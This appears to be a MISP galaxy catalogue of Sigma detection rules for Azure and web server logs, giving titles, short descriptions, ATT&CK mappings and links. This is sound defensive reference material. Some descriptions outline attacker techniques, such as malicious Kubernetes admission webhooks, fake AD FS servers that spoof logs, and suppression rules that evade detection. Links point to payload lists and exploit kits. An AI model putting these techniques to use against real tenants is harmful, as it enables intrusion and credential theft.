The tag is: misp-galaxy:sigma-rules="Guest Users Invited To Tenant By Non Approved Inviters"

Guest Users Invited To Tenant By Non Approved Inviters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11336. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml

PIM Approvals And Deny Elevation

Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.

The tag is: misp-galaxy:sigma-rules="PIM Approvals And Deny Elevation"

PIM Approvals And Deny Elevation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11337. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml

Delegated Permissions Granted For All Users

Detects when highly privileged delegated permissions are granted on behalf of all users

The tag is: misp-galaxy:sigma-rules="Delegated Permissions Granted For All Users"

Delegated Permissions Granted For All Users has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11338. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml

Changes to Device Registration Policy

Monitor and alert for changes to the device registration policy.

The tag is: misp-galaxy:sigma-rules="Changes to Device Registration Policy"

Changes to Device Registration Policy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"

Table 11339. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml

Privileged Account Creation

Detects when a new admin is created.

The tag is: misp-galaxy:sigma-rules="Privileged Account Creation"

Privileged Account Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11340. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml

User Removed From Group With CA Policy Modification Access

Monitor and alert on group membership removal of groups that have CA policy modification access

The tag is: misp-galaxy:sigma-rules="User Removed From Group With CA Policy Modification Access"

User Removed From Group With CA Policy Modification Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11341. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml

Detects when end user consent is blocked due to risk-based consent.

The tag is: misp-galaxy:sigma-rules="End User Consent Blocked"

End User Consent Blocked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11342. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml

Azure Key Vault Modified or Deleted

Identifies when a key vault is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Key Vault Modified or Deleted"

Azure Key Vault Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11344. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml

Azure Firewall Rule Collection Modified or Deleted

Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Firewall Rule Collection Modified or Deleted"

Azure Firewall Rule Collection Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11345. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml

Azure Kubernetes Admission Controller

Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.

The tag is: misp-galaxy:sigma-rules="Azure Kubernetes Admission Controller"

Azure Kubernetes Admission Controller has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"

Table 11346. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml

Rare Subscription-level Operations In Azure

Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.

The tag is: misp-galaxy:sigma-rules="Rare Subscription-level Operations In Azure"

Rare Subscription-level Operations In Azure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 11347. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_rare_operations.yml

Azure Application Gateway Modified or Deleted

Identifies when a application gateway is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Application Gateway Modified or Deleted"

Table 11348. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml

Azure Application Security Group Modified or Deleted

Identifies when a application security group is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Application Security Group Modified or Deleted"

Table 11349. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml

Azure Device or Configuration Modified or Deleted

Identifies when a device or device configuration in azure is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Device or Configuration Modified or Deleted"

Azure Device or Configuration Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11351. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml

Azure Application Deleted

Identifies when a application is deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Application Deleted"

Azure Application Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 11352. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_deleted.yml

Azure Subscription Permission Elevation Via ActivityLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn’t planned. This setting could allow an attacker access to Azure subscriptions in your environment.

The tag is: misp-galaxy:sigma-rules="Azure Subscription Permission Elevation Via ActivityLogs"

Azure Subscription Permission Elevation Via ActivityLogs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11353. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml

Azure Firewall Rule Configuration Modified or Deleted

Identifies when a Firewall Rule Configuration is Modified or Deleted.

The tag is: misp-galaxy:sigma-rules="Azure Firewall Rule Configuration Modified or Deleted"

Table 11354. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml

Azure Network Security Configuration Modified or Deleted

Identifies when a network security configuration is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Network Security Configuration Modified or Deleted"

Table 11356. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml

Number Of Resource Creation Or Deployment Activities

Number of VM creations or deployment activities occur in Azure via the azureactivity log.

The tag is: misp-galaxy:sigma-rules="Number Of Resource Creation Or Deployment Activities"

Number Of Resource Creation Or Deployment Activities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11357. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml

Azure Virtual Network Device Modified or Deleted

Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.

The tag is: misp-galaxy:sigma-rules="Azure Virtual Network Device Modified or Deleted"

Table 11358. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml

Azure Network Firewall Policy Modified or Deleted

Identifies when a Firewall Policy is Modified or Deleted.

The tag is: misp-galaxy:sigma-rules="Azure Network Firewall Policy Modified or Deleted"

Azure Network Firewall Policy Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007" with estimative-language:likelihood-probability="almost-certain"

Table 11359. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml

Azure New CloudShell Created

Identifies when a new cloudshell is created inside of Azure portal.

The tag is: misp-galaxy:sigma-rules="Azure New CloudShell Created"

Azure New CloudShell Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11361. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml

Azure Application Credential Modified

Identifies when a application credential is modified.

The tag is: misp-galaxy:sigma-rules="Azure Application Credential Modified"

Table 11362. Table References

Links

https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_app_credential_modification.yml

Azure Active Directory Hybrid Health AD FS Service Delete

This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.

The tag is: misp-galaxy:sigma-rules="Azure Active Directory Hybrid Health AD FS Service Delete"

Azure Active Directory Hybrid Health AD FS Service Delete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003" with estimative-language:likelihood-probability="almost-certain"

Table 11363. Table References

Links

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml

Azure Suppression Rule Created

Identifies when a suppression rule is created in Azure. Adversary’s could attempt this to evade detection.

The tag is: misp-galaxy:sigma-rules="Azure Suppression Rule Created"

Table 11364. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml

Azure Active Directory Hybrid Health AD FS New Server

This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

The tag is: misp-galaxy:sigma-rules="Azure Active Directory Hybrid Health AD FS New Server"

Azure Active Directory Hybrid Health AD FS New Server has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578" with estimative-language:likelihood-probability="almost-certain"

Table 11365. Table References

Links

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml

Azure Owner Removed From Application or Service Principal

Identifies when a owner is was removed from a application or service principal in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Owner Removed From Application or Service Principal"

Table 11366. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml

Granting Of Permissions To An Account

Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.

The tag is: misp-galaxy:sigma-rules="Granting Of Permissions To An Account"

Granting Of Permissions To An Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11367. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml

Azure Keyvault Key Modified or Deleted

Identifies when a Keyvault Key is modified or deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Keyvault Key Modified or Deleted"

Azure Keyvault Key Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11370. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml

Azure VPN Connection Modified or Deleted

Identifies when a VPN connection is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure VPN Connection Modified or Deleted"

Table 11371. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml

Azure Kubernetes Events Deleted

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

The tag is: misp-galaxy:sigma-rules="Azure Kubernetes Events Deleted"

Azure Kubernetes Events Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11373. Table References

Links

https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml

User Added to an Administrator’s Azure AD Role

User Added to an Administrator’s Azure AD Role

The tag is: misp-galaxy:sigma-rules="User Added to an Administrator’s Azure AD Role"

User Added to an Administrator’s Azure AD Role has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11374. Table References

Links

https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml

Azure Kubernetes CronJob

Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

The tag is: misp-galaxy:sigma-rules="Azure Kubernetes CronJob"

Azure Kubernetes CronJob has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11375. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

https://kubernetes.io/docs/concepts/workloads/controllers/job/

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml

Azure Firewall Modified or Deleted

Identifies when a firewall is created, modified, or deleted.

The tag is: misp-galaxy:sigma-rules="Azure Firewall Modified or Deleted"

Azure Firewall Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11377. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml

Azure DNS Zone Modified or Deleted

Identifies when DNS zone is modified or deleted.

The tag is: misp-galaxy:sigma-rules="Azure DNS Zone Modified or Deleted"

Azure DNS Zone Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11378. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml

Azure Virtual Network Modified or Deleted

Identifies when a Virtual Network is modified or deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Virtual Network Modified or Deleted"

Table 11379. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml

Azure Device No Longer Managed or Compliant

Identifies when a device in azure is no longer managed or compliant

The tag is: misp-galaxy:sigma-rules="Azure Device No Longer Managed or Compliant"

Table 11380. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml

Disabled MFA to Bypass Authentication Mechanisms

Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.

The tag is: misp-galaxy:sigma-rules="Disabled MFA to Bypass Authentication Mechanisms"

Disabled MFA to Bypass Authentication Mechanisms has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11381. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_mfa_disabled.yml

Azure Point-to-site VPN Modified or Deleted

Identifies when a Point-to-site VPN is Modified or Deleted.

The tag is: misp-galaxy:sigma-rules="Azure Point-to-site VPN Modified or Deleted"

Table 11382. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml

Azure Keyvault Secrets Modified or Deleted

Identifies when secrets are modified or deleted in Azure.

The tag is: misp-galaxy:sigma-rules="Azure Keyvault Secrets Modified or Deleted"

Azure Keyvault Secrets Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11383. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml

Nginx Core Dump

Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.

The tag is: misp-galaxy:sigma-rules="Nginx Core Dump"

Nginx Core Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 11386. Table References

Links

https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/

https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps

https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml

Apache Threading Error

Detects an issue in apache logs that reports threading related errors

The tag is: misp-galaxy:sigma-rules="Apache Threading Error"

Apache Threading Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 11387. Table References

Links

https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md

https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_threading_error.yml

Apache Segmentation Fault

Detects a segmentation fault error message caused by a crashing apache worker process

The tag is: misp-galaxy:sigma-rules="Apache Segmentation Fault"

Apache Segmentation Fault has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 11388. Table References

Links

http://www.securityfocus.com/infocus/1633

https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_segfault.yml

Windows Webshell Strings

Detects common commands used in Windows webshells

The tag is: misp-galaxy:sigma-rules="Windows Webshell Strings"

Windows Webshell Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11389. Table References

Links

https://bad-jubies.github.io/RCE-NOW-WHAT/

https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml

JNDIExploit Pattern

Detects exploitation attempt using the JNDI-Exploit-Kit

The tag is: misp-galaxy:sigma-rules="JNDIExploit Pattern"

JNDIExploit Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11390. Table References

Links

https://githubmemory.com/repo/FunctFan/JNDIExploit

https://github.com/pimps/JNDI-Exploit-Kit

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml

SQL Injection Strings In URI

Detects potential SQL injection attempts via GET requests in access logs.

The tag is: misp-galaxy:sigma-rules="SQL Injection Strings In URI"

SQL Injection Strings In URI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11391. Table References

Links

https://github.com/payloadbox/sql-injection-payload-list

https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/

https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection

https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/

https://brightsec.com/blog/sql-injection-payloads/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml

F5 BIG-IP iControl Rest API Command Execution - Webserver

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

The tag is: misp-galaxy:sigma-rules="F5 BIG-IP iControl Rest API Command Execution - Webserver"

F5 BIG-IP iControl Rest API Command Execution - Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11392. Table References

Links

https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash

https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029

https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml

Source Code Enumeration Detection by Keyword

Detects source code enumeration that use GET requests by keyword searches in URL strings

The tag is: misp-galaxy:sigma-rules="Source Code Enumeration Detection by Keyword"

Source Code Enumeration Detection by Keyword has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11393. Table References

Links

https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1

https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml

Cross Site Scripting Strings

Detects XSS attempts injected via GET requests in access logs

The tag is: misp-galaxy:sigma-rules="Cross Site Scripting Strings"

Cross Site Scripting Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 11395. Table References

Links

https://github.com/payloadbox/xss-payload-list

https://portswigger.net/web-security/cross-site-scripting/contexts

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_xss_in_access_logs.yml

Path Traversal Exploitation Attempts

Detects path traversal exploitation attempts

The tag is: misp-galaxy:sigma-rules="Path Traversal Exploitation Attempts"

Path Traversal Exploitation Attempts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11396. Table References

Links

https://github.com/projectdiscovery/nuclei-templates

https://book.hacktricks.xyz/pentesting-web/file-inclusion

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml

Detects known suspicious (default) user-agents related to scanning/recon tools

The tag is: misp-galaxy:sigma-rules="Suspicious User-Agents Related To Recon Tools"

Suspicious User-Agents Related To Recon Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11397. Table References

Links

https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb

https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92

